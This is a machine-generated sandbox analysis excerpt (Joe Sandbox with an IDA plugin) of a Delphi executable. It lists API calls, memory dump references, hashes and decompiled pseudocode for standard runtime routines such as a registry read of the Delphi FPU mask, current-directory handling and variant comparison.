                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                            • Opcode ID: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                                                            • Instruction ID: 51662933c9f6040cf9cf53aa0deae1acaa2dd39dd85ca193a1d107641bf38472
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0801B575A10208BAEB11DFD1DD02BBEB7ACEB08B01F100077BA14F25D0E6786A10CB5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402944(void* __eax, void* __edx) {
                                                                                                                                                                                                                            				char _v271;
                                                                                                                                                                                                                            				char _v532;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v535;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				if(__eax != 0) {
                                                                                                                                                                                                                            					 *_t26 = 0x40;
                                                                                                                                                                                                                            					_v535 = 0x3a;
                                                                                                                                                                                                                            					_v534 = 0;
                                                                                                                                                                                                                            					GetCurrentDirectoryA(0x105,  &_v271);
                                                                                                                                                                                                                            					SetCurrentDirectoryA(_t26);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x105,  &_v532);
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					SetCurrentDirectoryA( &_v271);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E00404C30(_t25, 0x105,  &_v532);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                                                                                                                                                                                            • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                                                                                                                                                                                            				signed short* _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v18;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed short _t136;
                                                                                                                                                                                                                            				signed short* _t256;
                                                                                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                                                                                            				intOrPtr _t310;
                                                                                                                                                                                                                            				intOrPtr _t318;
                                                                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                                                                            				signed int _t338;
                                                                                                                                                                                                                            				void* _t346;
                                                                                                                                                                                                                            				void* _t348;
                                                                                                                                                                                                                            				intOrPtr _t349;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t353 = __fp0;
                                                                                                                                                                                                                            				_t346 = _t348;
                                                                                                                                                                                                                            				_t349 = _t348 + 0xffffffd8;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t256 = __eax;
                                                                                                                                                                                                                            				_v13 = 1;
                                                                                                                                                                                                                            				_t338 =  *((intOrPtr*)(__eax));
                                                                                                                                                                                                                            				if((_t338 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            					_t136 =  *_v8;
                                                                                                                                                                                                                            					if(_t136 != 0) {
                                                                                                                                                                                                                            						if(_t136 != 1) {
                                                                                                                                                                                                                            							if(E0041713C(_t338,  &_v24) != 0) {
                                                                                                                                                                                                                            								_push( &_v18);
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                                                                                                                                                                                            									_t341 =  *_v8;
                                                                                                                                                                                                                            									if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            										if(E0041713C(_t341,  &_v28) != 0) {
                                                                                                                                                                                                                            											_push( &_v16);
                                                                                                                                                                                                                            											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            												E0041024C(0xb);
                                                                                                                                                                                                                            												goto L46;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												if( *_t256 == _v16) {
                                                                                                                                                                                                                            													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            													goto L46;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													_push( &_v44);
                                                                                                                                                                                                                            													L0040F318();
                                                                                                                                                                                                                            													_push(_t346);
                                                                                                                                                                                                                            													_push(0x416ab5);
                                                                                                                                                                                                                            													_push( *[fs:eax]);
                                                                                                                                                                                                                            													 *[fs:eax] = _t349;
                                                                                                                                                                                                                            													_t268 = _v16 & 0x0000ffff;
                                                                                                                                                                                                                            													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            													if(_v44 != _v16) {
                                                                                                                                                                                                                            														E0041015C(_t268);
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            													_pop(_t307);
                                                                                                                                                                                                                            													 *[fs:eax] = _t307;
                                                                                                                                                                                                                            													_push(0x416ae8);
                                                                                                                                                                                                                            													return E004109E8( &_v44);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											E0041024C(0xb);
                                                                                                                                                                                                                            											goto L46;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x4169ff);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t273 =  *_v8 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            										if( *_v8 != _v44) {
                                                                                                                                                                                                                            											E0041015C(_t273);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v13 = E00416548( &_v44, _v12, _v8, _t353);
                                                                                                                                                                                                                            										_pop(_t310);
                                                                                                                                                                                                                            										 *[fs:eax] = _t310;
                                                                                                                                                                                                                            										_push(0x416ae8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if( *_v8 == _v18) {
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x41695d);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t278 = _v18 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                                                                                                                                                                                            										if(_v44 != _v18) {
                                                                                                                                                                                                                            											E0041015C(_t278);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            										_pop(_t318);
                                                                                                                                                                                                                            										 *[fs:eax] = _t318;
                                                                                                                                                                                                                            										_push(0x416ae8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E0041024C(__ecx);
                                                                                                                                                                                                                            								goto L46;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v13 = E00416328(_v12, 2);
                                                                                                                                                                                                                            							goto L46;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v13 = E00416314(0, 1);
                                                                                                                                                                                                                            						goto L46;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t338 != 0) {
                                                                                                                                                                                                                            						if(_t338 != 1) {
                                                                                                                                                                                                                            							if(E0041713C( *_v8,  &_v28) != 0) {
                                                                                                                                                                                                                            								_push( &_v16);
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            									_push( &_v44);
                                                                                                                                                                                                                            									L0040F318();
                                                                                                                                                                                                                            									_push(_t346);
                                                                                                                                                                                                                            									_push(0x41686d);
                                                                                                                                                                                                                            									_push( *[fs:eax]);
                                                                                                                                                                                                                            									 *[fs:eax] = _t349;
                                                                                                                                                                                                                            									_t284 =  *_t256 & 0x0000ffff;
                                                                                                                                                                                                                            									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                                                                                                                                                                                                                            									if((_v44 & 0x00000fff) !=  *_t256) {
                                                                                                                                                                                                                            										E0041015C(_t284);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
                                                                                                                                                                                                                            									_pop(_t325);
                                                                                                                                                                                                                            									 *[fs:eax] = _t325;
                                                                                                                                                                                                                            									_push(0x416ae8);
                                                                                                                                                                                                                            									return E004109E8( &_v44);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if( *_t256 == _v16) {
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x4167df);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t289 = _v16 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            										if((_v44 & 0x00000fff) != _v16) {
                                                                                                                                                                                                                            											E0041015C(_t289);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                                                                                                                                                                                            										_pop(_t333);
                                                                                                                                                                                                                            										 *[fs:eax] = _t333;
                                                                                                                                                                                                                            										_push(0x416ae8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E0041024C(__ecx);
                                                                                                                                                                                                                            								goto L46;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v13 = E00416328(_v12, 0);
                                                                                                                                                                                                                            							goto L46;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v13 = E00416314(1, 0);
                                                                                                                                                                                                                            						L46:
                                                                                                                                                                                                                            						return _v13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x0041676f
                                                                                                                                                                                                                            0x00416776
                                                                                                                                                                                                                            0x00416777
                                                                                                                                                                                                                            0x0041677c
                                                                                                                                                                                                                            0x0041677f
                                                                                                                                                                                                                            0x00416782
                                                                                                                                                                                                                            0x0041678b
                                                                                                                                                                                                                            0x0041679c
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x004167c6
                                                                                                                                                                                                                            0x004167cb
                                                                                                                                                                                                                            0x004167ce
                                                                                                                                                                                                                            0x004167d1
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00416717
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00416700
                                                                                                                                                                                                                            0x00416709
                                                                                                                                                                                                                            0x00416ae8
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x004166fe

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                                                                                                                                                                                            • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                                                                                                                                                                                            				signed short* _v8;
                                                                                                                                                                                                                            				signed short* _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				signed int _v18;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                                                                            				intOrPtr _t216;
                                                                                                                                                                                                                            				intOrPtr _t217;
                                                                                                                                                                                                                            				intOrPtr _t250;
                                                                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                                                                            				intOrPtr _t259;
                                                                                                                                                                                                                            				intOrPtr _t264;
                                                                                                                                                                                                                            				intOrPtr _t268;
                                                                                                                                                                                                                            				void* _t271;
                                                                                                                                                                                                                            				void* _t273;
                                                                                                                                                                                                                            				intOrPtr _t274;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t278 = __fp0;
                                                                                                                                                                                                                            				_t269 = __edi;
                                                                                                                                                                                                                            				_t271 = _t273;
                                                                                                                                                                                                                            				_t274 = _t273 + 0xffffffd8;
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t204 =  *_v8;
                                                                                                                                                                                                                            				if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            					if(E0041713C(_t204,  &_v24) == 0) {
                                                                                                                                                                                                                            						E0041024C(__ecx);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push( &_v20);
                                                                                                                                                                                                                            					_t216 = _v16;
                                                                                                                                                                                                                            					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                                                                                                                                                                                            						_t207 =  *_v12;
                                                                                                                                                                                                                            						if((_t207 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            							if(E0041713C(_t207,  &_v28) != 0) {
                                                                                                                                                                                                                            								_push( &_v18);
                                                                                                                                                                                                                            								_t217 = _v16;
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            									_t119 = E0041024C(_t217);
                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if( *_v8 == _v18) {
                                                                                                                                                                                                                            										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t271);
                                                                                                                                                                                                                            										_push(0x415779);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t274;
                                                                                                                                                                                                                            										_t219 = _v18 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
                                                                                                                                                                                                                            										E00410E14(_v8,  &_v44);
                                                                                                                                                                                                                            										if( *_v8 != _v18) {
                                                                                                                                                                                                                            											E0041015C(_t219);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_pop(_t250);
                                                                                                                                                                                                                            										 *[fs:eax] = _t250;
                                                                                                                                                                                                                            										_push(0x415780);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t119 = E0041024C(_t216);
                                                                                                                                                                                                                            								goto L40;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_t207 ==  *_v8) {
                                                                                                                                                                                                                            								_t119 = E004161B0(_v8, _v16, _v12);
                                                                                                                                                                                                                            								goto L40;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push( &_v44);
                                                                                                                                                                                                                            								L0040F318();
                                                                                                                                                                                                                            								_push(_t271);
                                                                                                                                                                                                                            								_push(0x4156ca);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t274;
                                                                                                                                                                                                                            								_t224 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                                            								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
                                                                                                                                                                                                                            								E00410E14(_v8,  &_v44);
                                                                                                                                                                                                                            								if( *_v8 !=  *_v12) {
                                                                                                                                                                                                                            									E0041015C(_t224);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_pop(_t255);
                                                                                                                                                                                                                            								 *[fs:eax] = _t255;
                                                                                                                                                                                                                            								_push(0x4156d1);
                                                                                                                                                                                                                            								return E004109E8( &_v44);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *_v12 == _v20) {
                                                                                                                                                                                                                            							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                            							L0040F318();
                                                                                                                                                                                                                            							_push(_t271);
                                                                                                                                                                                                                            							_push(0x41562f);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t274;
                                                                                                                                                                                                                            							_t228 = _v20 & 0x0000ffff;
                                                                                                                                                                                                                            							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
                                                                                                                                                                                                                            							if(_v44 != _v20) {
                                                                                                                                                                                                                            								E0041015C(_t228);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
                                                                                                                                                                                                                            							_pop(_t259);
                                                                                                                                                                                                                            							 *[fs:eax] = _t259;
                                                                                                                                                                                                                            							_push(0x415799);
                                                                                                                                                                                                                            							return E004109E8( &_v44);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(E0041713C( *_v12,  &_v28) != 0) {
                                                                                                                                                                                                                            						_push( &_v18);
                                                                                                                                                                                                                            						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                            							L0040F318();
                                                                                                                                                                                                                            							_push(_t271);
                                                                                                                                                                                                                            							_push(0x41558f);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t274;
                                                                                                                                                                                                                            							_t234 =  *_v8 & 0x0000ffff;
                                                                                                                                                                                                                            							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
                                                                                                                                                                                                                            							if( *_v8 != _v44) {
                                                                                                                                                                                                                            								E0041015C(_t234);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E004161B0(_v8, _v16,  &_v44);
                                                                                                                                                                                                                            							_pop(_t264);
                                                                                                                                                                                                                            							 *[fs:eax] = _t264;
                                                                                                                                                                                                                            							_push(0x415799);
                                                                                                                                                                                                                            							return E004109E8( &_v44);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *_v8 == _v18) {
                                                                                                                                                                                                                            								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
                                                                                                                                                                                                                            								goto L40;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push( &_v44);
                                                                                                                                                                                                                            								L0040F318();
                                                                                                                                                                                                                            								_push(_t271);
                                                                                                                                                                                                                            								_push(0x415514);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t274;
                                                                                                                                                                                                                            								_t239 = _v18 & 0x0000ffff;
                                                                                                                                                                                                                            								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                                                                                                                                                                                            								E00410E14(_v8,  &_v44);
                                                                                                                                                                                                                            								if( *_v8 != _v18) {
                                                                                                                                                                                                                            									E0041015C(_t239);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_pop(_t268);
                                                                                                                                                                                                                            								 *[fs:eax] = _t268;
                                                                                                                                                                                                                            								_push(0x41551b);
                                                                                                                                                                                                                            								return E004109E8( &_v44);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t119 = E0041024C(__ecx);
                                                                                                                                                                                                                            						L40:
                                                                                                                                                                                                                            						return _t119;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            0x0041571f
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x00415663
                                                                                                                                                                                                                            0x0041566c
                                                                                                                                                                                                                            0x004156da
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041566e
                                                                                                                                                                                                                            0x00415671
                                                                                                                                                                                                                            0x00415672
                                                                                                                                                                                                                            0x00415679
                                                                                                                                                                                                                            0x0041567a
                                                                                                                                                                                                                            0x0041567f
                                                                                                                                                                                                                            0x00415682
                                                                                                                                                                                                                            0x00415688
                                                                                                                                                                                                                            0x00415691
                                                                                                                                                                                                                            0x0041569c
                                                                                                                                                                                                                            0x004156ad
                                                                                                                                                                                                                            0x004156af
                                                                                                                                                                                                                            0x004156af
                                                                                                                                                                                                                            0x004156b6
                                                                                                                                                                                                                            0x004156b9
                                                                                                                                                                                                                            0x004156bc
                                                                                                                                                                                                                            0x004156c9
                                                                                                                                                                                                                            0x004156c9
                                                                                                                                                                                                                            0x0041566c
                                                                                                                                                                                                                            0x004155c6
                                                                                                                                                                                                                            0x004155d0
                                                                                                                                                                                                                            0x00415645
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004155d2
